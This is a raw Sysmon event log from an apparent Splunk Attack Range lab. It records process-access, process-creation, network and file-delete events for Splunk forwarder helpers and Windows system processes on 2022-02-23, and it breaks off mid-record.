11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-18CC-6216-3605-000000003902}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18CC-6216-3605-000000003902}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.978{4F8D34B0-18CC-6216-3605-000000003902}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.120{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51705-false10.0.1.12-8089- 23542300x8000000000000000222258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=381233CBEBF353BAE7816830E3884B47,SHA256=77BC4500FEFD1B1A95008E907B775DFABF0FA753A1D5CAEBBEDB33B74F145C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9891D920B85DC9965DB9283CFCA988E4,SHA256=0C30BCBCDE1E98846E87DA4FB5790B59FB039E3B8ADB783DC2F226ED1AC57B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:49.411{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94FBC4394C8E5D905C317AA2E73F1FB7,SHA256=3B8FDB17AF31F3BCED2CCF07DEBF5A4B715F5D3AAC1E42ECAEAA58D16269A6AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.727{4F8D34B0-18CD-6216-3705-000000003902}8721988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18CD-6216-3705-000000003902}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-18CD-6216-3705-000000003902}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.493{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18CD-6216-3705-000000003902}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.494{4F8D34B0-18CD-6216-3705-000000003902}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.321{4F8D34B0-18CC-6216-3605-000000003902}3116932C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 